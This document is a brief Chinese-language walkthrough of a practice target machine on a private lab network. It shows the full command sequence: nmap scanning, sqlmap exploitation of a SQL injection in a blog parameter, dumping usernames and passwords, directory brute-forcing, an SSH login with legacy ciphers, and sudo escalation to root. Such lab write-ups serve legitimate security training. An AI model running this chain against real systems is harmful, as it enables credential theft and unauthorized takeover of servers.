一个简单的靶机训练
主机扫描端口发现
nmap -sP 192.168.181.0/24
nmap -p 1-65535 -A 192.168.181.150
进去80端口瞧瞧
到处看看
发现这个blog的url里面有个参数id,很有可能存在sql注入漏洞
手动试试
随便加个‘就报错了,一看就是有漏洞
太明显了,数值型注入
接下来就交给sqlmap吧
sqlmap -u "http://192.168.181.150/index.html?page=blog&title=Blog&id=2" --level 5 --risk 3
sqlmap -u "http://192.168.181.150/index.html?page=blog&title=Blog&id=2" --level 5 --risk 3 --dbs
sqlmap -u "http://192.168.181.150/index.html?page=blog&title=Blog&id=2" --level 5 --risk 3 --current-db
sqlmap -u "http://192.168.181.150/index.html?page=blog&title=Blog&id=2" --level 5 --risk 3 -D ehks --tables
sqlmap -u "http://192.168.181.150/index.html?page=blog&title=Blog&id=2" --level 5 --risk 3 -D ehks -T user -columns
sqlmap -u "http://192.168.181.150/index.html?page=blog&title=Blog&id=2" --level 5 --risk 3 -D ehks -T user -C user_name,user_pass --dump
有密码,看看哪里登陆,扫扫目录看看
dirb http://192.168.181.150
admin一看就跟登陆有关
http://192.168.181.150/admin/
随便找个账户登陆看看
没卵用
那就直接ssh连接试试
直接用ssh user@192.168.181.150会报错
用这个方法连上了
ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 -oHostKeyAlgorithms=+ssh-dss -oCiphers=+3des-cbc dstevens@192.168.181.150
直接sudo -l查看可使用的sudo命令,竟然全都可以?!
那就直接sudo su
就这啊?
o了 😃